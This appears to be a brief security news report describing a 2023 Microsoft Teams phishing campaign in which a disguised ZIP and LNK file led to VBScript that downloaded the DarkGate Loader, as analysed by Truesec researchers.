The campaign began in late August 2023 when two infected external Office 365 accounts were seen sending Microsoft Teams phishing mails to other businesses.
The purpose of these accounts was to deceive other users of Microsoft Teams into downloading and opening a ZIP file with the name “Changes to the vacation schedule.”
A ZIP file posing as a PDF document is downloaded from a SharePoint URL when you click on the attachment. The ZIP file includes an LNK file.
After conducting an analysis, researchers at Truesec discovered that the Microsoft Teams phishing effort included malicious VBScript that starts an infection chain and releases a payload known as the DarkGate Loader.
The download procedure uses Windows cURL to get the malware’s script and executable files in an attempt to avoid detection.
The script was pre-compiled when it was sent, concealing its dangerous code in the middle of the file, starting with recognizable “magic bytes” that are connected to AutoIT scripts.